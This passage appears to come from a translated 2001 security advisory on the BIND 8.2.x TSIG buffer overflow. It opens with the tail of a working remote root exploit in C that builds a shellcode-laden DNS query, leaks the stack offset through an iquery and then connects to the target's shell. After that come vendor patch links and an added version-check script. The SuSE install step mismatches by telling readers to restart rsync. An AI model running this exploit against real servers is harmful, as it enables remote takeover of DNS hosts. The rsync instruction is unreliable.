                *ptr++ = (lameaddr & 0x0000ff00) >> 8;
                *ptr++ = (lameaddr & 0x00ff0000) >> 16;
                *ptr++ = (lameaddr & 0xff000000) >> 24;
                *ptr++ = shelladdr & 0x000000ff;
                *ptr++ = (shelladdr & 0x0000ff00) >> 8;
                *ptr++ = (shelladdr & 0x00ff0000) >> 16;
                *ptr++ = (shelladdr & 0xff000000) >> 24;
                                *ptr++ = argevdisp1 & 0x000000ff;
                                *ptr++ = (argevdisp1 & 0x0000ff00) >> 8;
                                *ptr++ = (argevdisp1 & 0x00ff0000) >> 16;
                                *ptr++ = (argevdisp1 & 0xff000000) >> 24;
                                *ptr++ = argevdisp2 & 0x000000ff;
                                *ptr++ = (argevdisp2 & 0x0000ff00) >> 8;
                                *ptr++ = (argevdisp2 & 0x00ff0000) >> 16;
                                *ptr++ = (argevdisp2 & 0xff000000) >> 24;
                i += 15;
            }
            else
            {
                if (shellstarted && !shelldone)
                {
                    *ptr++ = shellcode[shelloff++];    
                    if(shelloff == (sizeof(shellcode)))
                        shelldone=1;
                }
                else
                {
                    *ptr++ = i;
                }
            }
        }
        
        /* OK: this next set of bytes constitutes the end of the
                 *     NAME field, the QTYPE field, and the QCLASS field.
                 *     We have to have the shellcode skip over these bytes,
                 *     as well as the leading 0x3f (63) byte for the next
                 *     NAME field.  We do that by putting a jmp instruction
                 *     here.
                 */
        *ptr++ = 0xeb;
        
        if (k == 0)
        {
            *ptr++ = 10;
            
            /* For alignment reasons, we need to stick an extra
                         * NAME segment in here, of length 3 (2 + header).
                         */
            m = 2;
            *ptr++ = (char)m;        // header
            ptr += 2;
        }
        else
        {
            *ptr++ = 0x07;
        }
        
        /* End the NAME with a compressed pointer.  Note that it's
                 * not clear that the value used, C0 00, is legal (it
                 * points to the beginning of the packet), but BIND apparently
                 * treats such things as name terminators, anyway.
                 */
        *ptr++ = 0xc0; /*NS_CMPRSFLGS*/
        *ptr++ = 0x00; /*NS_CMPRSFLGS*/
        
        ptr += 4;      /* QTYPE, QCLASS */
    }
    
    /* Now we make the TSIG AR */
    *ptr++ = 0x00;       /* Empty name */

    PUTSHORT(0xfa, ptr); /* Type  TSIG */
    PUTSHORT(0xff, ptr); /* Class ANY  */

    bufflen = ptr - buff;
    
    // dumpbuf(buff, bufflen);

    return(bufflen);
}

long xtract_offset(char* buff, int len)
{
    long ret;
    
    /* Here be dragons. */
    /* (But seriously, the values here depend on compilation options
         *  used for BIND.
         */
    ret = *((long*)&buff[0x214]);
    argevdisp1 = 0x080d7cd0;
    argevdisp2 = *((long*)&buff[0x264]);
    printf("[d] argevdisp1 = %08x, argevdisp2 = %08x\n",
        argevdisp1, argevdisp2);
    
    // dumpbuf(buff, len);
    
    return(ret);
}




int main(int argc, char* argv[])
{
    struct sockaddr_in sa;
    int sock;
    long address;
    char buff[BUFFSIZE];
    int len, i;
    long offset;
    socklen_t reclen;
    unsigned char foo[4];

    printf("[*] named 8.2.x (< 8.2.3-REL) remote root exploit by lucysoft, Ix\n");
    printf("[*] fixed by ian@cypherpunks.ca and jwilkins@bitland.net\n\n");

    address = 0;
    if (argc < 2)
    {
        printf("[*] usage : %s host\n", argv[0]);

        return(-1);
    }

    if (!(address = resolve_host(argv[1])))
    {
        printf("[x] unable to resolve %s, try using an IP address\n", argv[1]);
        return(-1);
    } else {
        memcpy(foo, &address, 4);
        printf("[*] attacking %s (%d.%d.%d.%d)\n", argv[1], foo[0], foo[1], foo[2], foo[3]);
    }
    
    sa.sin_family = AF_INET;

    if (0 > (sock = socket(sa.sin_family, SOCK_DGRAM, 0)))
    {
        return(-1);
    }
    
    sa.sin_family = AF_INET;
    sa.sin_port = htons(53);
    sa.sin_addr.s_addr= address;
    
    
    len = infoleak_qry(buff);
    printf("[d] infoleak_qry was %d long\n", len);
    len = sendto(sock, buff, len, 0 , (struct sockaddr *)&sa, sizeof(sa));
    if (len < 0)
    {
        printf("[*] unable to send iquery\n");
        return(-1);
    }
    
    reclen = sizeof(sa);
    len = recvfrom(sock, buff, BUFFSIZE, 0, (struct sockaddr *)&sa, &reclen);
    if (len < 0)
    {
                printf("[x] unable to receive iquery answer\n");
                return(-1);    
    }
    printf("[*] iquery resp len = %d\n", len);
    
    offset = xtract_offset(buff, len);
    printf("[*] retrieved stack offset = %x\n", offset);
    
    
    len = evil_query(buff, offset);
    if(len < 0){
        printf("[x] error sending tsig packet\n");
        return(0);
    }
    
    sendto(sock, buff, len, 0 , (struct sockaddr *)&sa, sizeof(sa));
    
    if (0 > close(sock))
    {
        return(-1);
    }

    connection(sa);

    return(0);    
}
/*                   www.hack.co.za  [2 March 2001]*/

Recommendations:
Vendor patches:

Caldera
-------
Caldera has released a security advisory (CSSA-2001-008.1) and corresponding patches for this issue:
CSSA-2001-008.1: BIND buffer overflow
Link: http://www.caldera.com/support/security/advisories/CSSA-2001-008.1.txt

Patch download:

Caldera RPM OpenLinux 2.3 bind-8.2.3-1.i386.rpm
ftp://ftp.calderasystems.com/pub/updates/OpenLinux/2.3/current/RPMS/RPMS/bind-8.2.3-1.i386.rpm

Caldera RPM OpenLinux 2.3 bind-doc-8.2.3-1.i386.rpm
ftp://ftp.calderasystems.com/pub/updates/OpenLinux/2.3/current/RPMS/RPMS/bind-doc-8.2.3-1.i386.rpm

Caldera RPM OpenLinux 2.3 bind-utils-8.2.3-1.i386.rpm
ftp://ftp.calderasystems.com/pub/updates/OpenLinux/2.3/current/RPMS/RPMS/bind-utils-8.2.3-1.i386.rpm

Caldera RPM eServer 2.3.1/eBuilder for ECential 3.0 bind-8.2.3-1.i386.rpm
ftp://ftp.calderasystems.com/pub/updates/eServer/2.3/current/RPMS/RPMS/bind-8.2.3-1.i386.rpm

Caldera RPM eServer 2.3.1/eBuilder for ECential 3.0 bind-doc-8.2.3-1.i386.rpm
ftp://ftp.calderasystems.com/pub/updates/eServer/2.3/current/RPMS/RPMS/bind-doc-8.2.3-1.i386.rpm

Caldera RPM eServer 2.3.1/eBuilder for ECential 3.0 bind-utils-8.2.3-1.i386.rpm
ftp://ftp.calderasystems.com/pub/updates/eServer/2.3/current/RPMS/RPMS/bind-utils-8.2.3-1.i386.rpm

Caldera RPM eDesktop 2.4 bind-8.2.3-1.i386.rpm
ftp://ftp.calderasystems.com/pub/updates/eDesktop/2.4/current/RPMS/RPMS/bind-8.2.3-1.i386.rpm

Caldera RPM eDesktop 2.4 bind-doc-8.2.3-1.i386.rpm
ftp://ftp.calderasystems.com/pub/updates/eDesktop/2.4/current/RPMS/RPMS/bind-doc-8.2.3-1.i386.rpm

Caldera RPM eDesktop 2.4 bind-utils-8.2.3-1.i386.rpm
ftp://ftp.calderasystems.com/pub/updates/eDesktop/2.4/current/RPMS/RPMS/bind-utils-8.2.3-1.i386.rpm

Caldera Hotfix OpenServer <= 5.0.6a newbind.tar.Z
ftp://ftp.sco.com/pub/security/openserver/sr379322/newbind.tar.Z

Conectiva
---------
Conectiva has released a security advisory (CLA-2001:377) and corresponding patches for this issue:
CLA-2001:377: Buffer overflow in bind allows a remote exploit
Link: http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000377

Patch download:

ftp://atualizacoes.conectiva.com.br/4.0/SRPMS/bind-8.2.3-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/bind-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/bind-devel-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/bind-devel-static-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/bind-doc-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/bind-utils-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/SRPMS/bind-8.2.3-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/bind-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/bind-devel-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/bind-devel-static-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/bind-doc-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/bind-utils-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/SRPMS/bind-8.2.3-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/bind-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/bind-devel-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/bind-devel-static-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/bind-doc-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/bind-utils-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/SRPMS/bind-8.2.3-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/bind-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/bind-devel-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/bind-devel-static-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/bind-doc-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/bind-utils-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/SRPMS/bind-8.2.3-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.0/SRPMS/bind-chroot-8.2.3-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/bind-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/bind-devel-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/bind-chroot-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/bind-devel-static-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/bind-doc-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/bind-utils-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/SRPMS/bind-8.2.3-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.1/SRPMS/bind-chroot-8.2.3-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/bind-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/bind-devel-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/bind-devel-static-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/bind-doc-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/bind-utils-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/bind-chroot-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/bind-8.2.3-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/bind-chroot-8.2.3-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/bind-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/bind-devel-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/bind-chroot-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/bind-devel-static-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/bind-doc-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/bind-utils-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/SRPMS/bind-8.2.3-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/bind-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/bind-chroot-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/bind-devel-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/bind-devel-static-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/bind-doc-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/bind-utils-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/SRPMS/bind-8.2.3-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/bind-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/bind-chroot-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/bind-devel-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/bind-devel-static-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/bind-doc-8.2.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/bind-utils-8.2.3-1cl.i386.rpm

Users of Conectiva Linux 6.0 and later can update the RPM packages with apt:

- Add the following line to /etc/apt/sources.list:
  
rpm [cncbr] ftp://atualizacoes.conectiva.com.br 6.0/conectiva updates

(If you are not running version 6.0, replace the 6.0 above with the appropriate version number.)

- Run:                    apt-get update
- After the update, run:  apt-get upgrade

Debian
------
Debian has released a security advisory (DSA-026-1) and the corresponding patches:
DSA-026-1: New version of BIND 8 released
Link: http://www.debian.org/security/2001/dsa-026

Patch downloads:

Source archives:

http://security.debian.org/dists/stable/updates/main/source/bind_8.2.3-0.potato.1.diff.gz
http://security.debian.org/dists/stable/updates/main/source/bind_8.2.3-0.potato.1.dsc
http://security.debian.org/dists/stable/updates/main/source/bind_8.2.3.orig.tar.gz

Intel ia32 architecture:

http://security.debian.org/dists/stable/updates/main/binary-i386/bind-dev_8.2.3-0.potato.1_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-i386/bind_8.2.3-0.potato.1_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-i386/dnsutils_8.2.3-0.potato.1_i386.deb

Motorola 680x0 architecture:

http://security.debian.org/dists/stable/updates/main/binary-m68k/bind-dev_8.2.3-0.potato.1_m68k.deb
http://security.debian.org/dists/stable/updates/main/binary-m68k/bind_8.2.3-0.potato.1_m68k.deb
http://security.debian.org/dists/stable/updates/main/binary-m68k/dnsutils_8.2.3-0.potato.1_m68k.deb

Sun Sparc architecture:

http://security.debian.org/dists/stable/updates/main/binary-sparc/bind-dev_8.2.3-0.potato.1_sparc.deb
http://security.debian.org/dists/stable/updates/main/binary-sparc/bind_8.2.3-0.potato.1_sparc.deb
http://security.debian.org/dists/stable/updates/main/binary-sparc/dnsutils_8.2.3-0.potato.1_sparc.deb

Alpha architecture:

http://security.debian.org/dists/stable/updates/main/binary-alpha/bind-dev_8.2.3-0.potato.1_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-alpha/bind_8.2.3-0.potato.1_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-alpha/dnsutils_8.2.3-0.potato.1_alpha.deb

PowerPC architecture:

http://security.debian.org/dists/stable/updates/main/binary-powerpc/bind-dev_8.2.3-0.potato.1_powerpc.deb
http://security.debian.org/dists/stable/updates/main/binary-powerpc/bind_8.2.3-0.potato.1_powerpc.deb
http://security.debian.org/dists/stable/updates/main/binary-powerpc/dnsutils_8.2.3-0.potato.1_powerpc.deb

ARM architecture:

http://security.debian.org/dists/stable/updates/main/binary-arm/bind-dev_8.2.3-0.potato.1_arm.deb


Patch installation:

1. Install the patch packages manually:

  First, download the patch with:
  # wget url  (url is the patch download link)

  Then install the patch with:
  # dpkg -i file.deb  (file is the name of the downloaded package)

2. Install the patch packages automatically with apt-get:

   First, refresh the package database:
   # apt-get update
  
   Then install the updated packages:
   # apt-get upgrade

ISC
---
ISC has made the new BIND 8.2.3 available for download; you can also download BIND 9.0 or 9.1.

Download:
http://www.isc.org/products/BIND/bind8.html
http://www.isc.org/products/BIND/bind9.html

RedHat
------
RedHat has released a security advisory (RHSA-2001:007-03) and the corresponding patches:
RHSA-2001:007-03: Updated bind packages available
Link: https://www.redhat.com/support/errata/RHSA-2001-007.html

Patch downloads:

Red Hat Linux 5.2:

SRPMS:
ftp://updates.redhat.com/5.2/SRPMS/bind-8.2.3-0.5.x.src.rpm

alpha:
ftp://updates.redhat.com/5.2/alpha/bind-8.2.3-0.5.x.alpha.rpm
ftp://updates.redhat.com/5.2/alpha/bind-devel-8.2.3-0.5.x.alpha.rpm
ftp://updates.redhat.com/5.2/alpha/bind-utils-8.2.3-0.5.x.alpha.rpm

i386:
ftp://updates.redhat.com/5.2/i386/bind-8.2.3-0.5.x.i386.rpm
ftp://updates.redhat.com/5.2/i386/bind-devel-8.2.3-0.5.x.i386.rpm
ftp://updates.redhat.com/5.2/i386/bind-utils-8.2.3-0.5.x.i386.rpm

sparc:

ftp://updates.redhat.com/5.2/sparc/bind-8.2.3-0.5.x.sparc.rpm
ftp://updates.redhat.com/5.2/sparc/bind-devel-8.2.3-0.5.x.sparc.rpm
ftp://updates.redhat.com/5.2/sparc/bind-utils-8.2.3-0.5.x.sparc.rpm

Red Hat Linux 6.2:

SRPMS:
ftp://updates.redhat.com/6.2/SRPMS/bind-8.2.3-0.6.x.src.rpm

alpha:
ftp://updates.redhat.com/6.2/alpha/bind-8.2.3-0.6.x.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/bind-devel-8.2.3-0.6.x.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/bind-utils-8.2.3-0.6.x.alpha.rpm

i386:
ftp://updates.redhat.com/6.2/i386/bind-8.2.3-0.6.x.i386.rpm
ftp://updates.redhat.com/6.2/i386/bind-devel-8.2.3-0.6.x.i386.rpm
ftp://updates.redhat.com/6.2/i386/bind-utils-8.2.3-0.6.x.i386.rpm

sparc:
ftp://updates.redhat.com/6.2/sparc/bind-8.2.3-0.6.x.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/bind-devel-8.2.3-0.6.x.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/bind-utils-8.2.3-0.6.x.sparc.rpm

Red Hat Linux 7.0:

SRPMS:
ftp://updates.redhat.com/7.0/SRPMS/bind-8.2.3-1.src.rpm

alpha:
ftp://updates.redhat.com/7.0/alpha/bind-8.2.3-1.alpha.rpm
ftp://updates.redhat.com/7.0/alpha/bind-devel-8.2.3-1.alpha.rpm
ftp://updates.redhat.com/7.0/alpha/bind-utils-8.2.3-1.alpha.rpm

i386:
ftp://updates.redhat.com/7.0/i386/bind-8.2.3-1.i386.rpm
ftp://updates.redhat.com/7.0/i386/bind-devel-8.2.3-1.i386.rpm

The patches can be installed with:

rpm -Fvh [filename]

S.u.S.E.
--------
S.u.S.E. has released a security advisory (SuSE-SA:2001:03) and the corresponding patches:
SuSE-SA:2001:03: bind8

Patch downloads:

i386 Intel Platform:
SuSE-7.1
ftp://ftp.suse.com/pub/suse/i386/update/7.1/n2/bind8-8.2.3-92.i386.rpm
source rpm:

ftp://ftp.suse.com/pub/suse/i386/update/7.1/zq1/bind8-8.2.3-92.src.rpm

SuSE-7.0
ftp://ftp.suse.com/pub/suse/i386/update/7.0/n1/bind8-8.2.3-61.i386.rpm
source rpm:
ftp://ftp.suse.com/pub/suse/i386/update/7.0/zq1/bind8-8.2.3-61.src.rpm

SuSE-6.4
ftp://ftp.suse.com/pub/suse/i386/update/6.4/n1/bind8-8.2.3-0.i386.rpm
source rpm:
ftp://ftp.suse.com/pub/suse/i386/update/6.4/zq1/bind8-8.2.3-0.src.rpm

SuSE-6.3
ftp://ftp.suse.com/pub/suse/i386/update/6.3/n1/bind8-8.2.3-0.i386.rpm
source rpm:
ftp://ftp.suse.com/pub/suse/i386/update/6.3/zq1/bind8-8.2.3-0.src.rpm

SuSE-6.2
ftp://ftp.suse.com/pub/suse/i386/update/6.2/n1/bind8-8.2.3-0.i386.rpm
source rpm:
ftp://ftp.suse.com/pub/suse/i386/update/6.2/zq1/bind8-8.2.3-0.src.rpm

SuSE-6.1
ftp://ftp.suse.com/pub/suse/i386/update/6.1/n1/bind8-8.2.3-0.i386.rpm
source rpm:
ftp://ftp.suse.com/pub/suse/i386/update/6.1/zq1/bind8-8.2.3-0.src.rpm

SuSE-6.0
Please use the SuSE-6.1 packages for the SuSE-6.0 distribution on the
i386 Intel Platform.



AXP Alpha Platform:

SuSE-7.0
ftp://ftp.suse.com/pub/suse/axp/update/7.0/n1/bind8-8.2.3-39.alpha.rpm
source rpm:
ftp://ftp.suse.com/pub/suse/axp/update/7.0/zq1/bind8-8.2.3-39.src.rpm

SuSE-6.4
ftp://ftp.suse.com/pub/suse/axp/update/6.4/n1/bind8-8.2.3-0.alpha.rpm
source rpm:
ftp://ftp.suse.com/pub/suse/axp/update/6.4/zq1/bind8-8.2.3-0.src.rpm

SuSE-6.3
ftp://ftp.suse.com/pub/suse/axp/update/6.3/n1/bind8-8.2.3-0.alpha.rpm
source rpm:
ftp://ftp.suse.com/pub/suse/axp/update/6.3/zq1/bind8-8.2.3-0.src.rpm

SuSE-6.1
ftp://ftp.suse.com/pub/suse/axp/update/6.1/n1/bind8-8.2.3-0.alpha.rpm
source rpm:
ftp://ftp.suse.com/pub/suse/axp/update/6.1/zq1/bind8-8.2.3-0.src.rpm

PPC Power PC Platform:

SuSE-7.0
ftp://ftp.suse.com/pub/suse/ppc/update/7.0/n1/bind8-8.2.3-39.ppc.rpm
source rpm:
ftp://ftp.suse.com/pub/suse/ppc/update/7.0/zq1/bind8-8.2.3-39.src.rpm

SuSE-6.4
ftp://ftp.suse.com/pub/suse/ppc/update/6.4/n1/bind8-8.2.3-0.ppc.rpm
source rpm:
ftp://ftp.suse.com/pub/suse/ppc/update/6.4/zq1/bind8-8.2.3-0.src.rpm


Sparc Platform:
Due to build bottlenecks, the update package for the sparc platform
(SuSE-7.0 distribution) is delayed.


Patch installation:

Install the file with "rpm -Fhv file.rpm". Afterwards, if the rsync service is started from inetd, send a signal to the inetd process to restart it; if rsync was started with "rsync --daemon", run that command again to restart the rsync service.
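
After applying any of the vendor updates above (the Conectiva and Debian apt steps, the RedHat "rpm -Fvh" step, or the SuSE "rpm -Fhv" step), a practitioner wants a quick way to confirm that the installed BIND package is now 8.2.3 or later. The script below is an added example written for this page; it is not part of the advisory or of any vendor's tooling. It assumes the version strings reported by rpm and dpkg look like those in the package names listed above ("8.2.3-0.6.x", "8.2.3-0.potato.1", "8.2.3-92") or like an upstream release ("8.2.2-P7"), and it compares only the leading MAJOR.MINOR.PATCH numbers, since every 8.2.2 patch level is listed as affected. The package names "bind" and "bind8" are taken from the download lists above; the function and file names are the example's own.

```shell
#!/bin/sh
# Added example (not from the advisory): decide whether an installed BIND 8
# version is at or above 8.2.3, the release the advisory names as the fix.
# Assumed input shapes: "8.2.2-P7", "8.2.3-0.6.x" (rpm VERSION-RELEASE),
# "8.2.3-0.potato.1" (dpkg), "9.1.0". Only MAJOR.MINOR.PATCH is compared.

# bind_base_version VERSION -> prints "MAJOR MINOR PATCH" (PATCH defaults to
# 0, so "8.2" becomes "8 2 0"); returns 2 when no MAJOR.MINOR is present.
bind_base_version() {
    ver=${1%%[!0-9.]*}          # drop everything from the first non-digit, non-dot character
    old_ifs=$IFS
    IFS=.
    set -- $ver                 # split the remaining "8.2.3" on the dots
    IFS=$old_ifs
    if [ -z "${1:-}" ] || [ -z "${2:-}" ]; then
        return 2
    fi
    printf '%s %s %s\n' "$1" "$2" "${3:-0}"
}

# bind_tsig_status VERSION -> prints one of:
#   vulnerable   8.2, 8.2.1 or 8.2.2 (any patch level): listed as affected
#   fixed        8.2.3 or later, including the BIND 9.0/9.1 alternative
#   not-covered  older than 8.2 or unparseable: not addressed by this advisory
bind_tsig_status() {
    set -- $(bind_base_version "$1")
    if [ $# -ne 3 ]; then
        echo not-covered
        return 0
    fi
    key=$(( $1 * 1000000 + $2 * 1000 + $3 ))   # 8.2.3 -> 8002003, so plain integer ordering works
    if [ "$key" -lt 8002000 ]; then
        echo not-covered
    elif [ "$key" -lt 8002003 ]; then
        echo vulnerable
    else
        echo fixed
    fi
    return 0
}

# installed_bind_version -> prints the version of the installed BIND package as
# the package manager reports it (rpm-based vendors above ship it as "bind" or
# "bind8"; Debian uses dpkg), or nothing when no such package is found.
installed_bind_version() {
    if command -v rpm >/dev/null 2>&1; then
        for pkg in bind bind8; do
            if out=$(rpm -q --qf '%{VERSION}-%{RELEASE}\n' "$pkg" 2>/dev/null); then
                printf '%s\n' "$out"
                return 0
            fi
        done
    fi
    if command -v dpkg-query >/dev/null 2>&1; then
        if out=$(dpkg-query -W -f '${Version}\n' bind 2>/dev/null); then
            printf '%s\n' "$out"
        fi
    fi
    return 0
}

# Usage: sh check_bind_tsig.sh [VERSION...]
# With no arguments the locally installed package is queried instead.
if [ $# -gt 0 ]; then
    for v in "$@"; do
        printf '%s: %s\n' "$v" "$(bind_tsig_status "$v")"
    done
else
    v=$(installed_bind_version)
    if [ -n "$v" ]; then
        printf 'installed bind %s: %s\n' "$v" "$(bind_tsig_status "$v")"
    else
        echo 'no bind package found via rpm or dpkg'
    fi
fi
```

A "fixed" result only says the package version is at or past 8.2.3; the running named process still has to be restarted after the package update for the new binary to be in use.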

TurboLinux
----------
TurboLinux has released a security advisory (TLSA2001004-1) and the corresponding patches:
TLSA2001004-1: Bind-8.2.3-2
Link:

Patch downloads:

TurboLinux RPM 6.0 bind-8.2.3-2.i386.rpm
ftp://ftp.turbolinux.com/pub/updates/6.0/security/bind-8.2.3-2.i386.rpm

TurboLinux RPM 6.0 bind-contrib-8.2.3-2.i386.rpm
ftp://ftp.turbolinux.com/pub/updates/6.0/security/bind-contrib-8.2.3-2.i386.rpm

TurboLinux RPM 6.0 bind-devel-8.2.3-2.i386.rpm
ftp://ftp.turbolinux.com/pub/updates/6.0/security/bind-devel-8.2.3-2.i386.rpm

TurboLinux RPM 6.0 bind-utils-8.2.3-2.i386.rpm
ftp://ftp.turbolinux.com/pub/updates/6.0/security/bind-utils-8.2.3-2.i386.rpm

This advisory was translated and compiled by NSFOCUS (绿盟科技). All rights reserved; reproduction without permission is prohibited.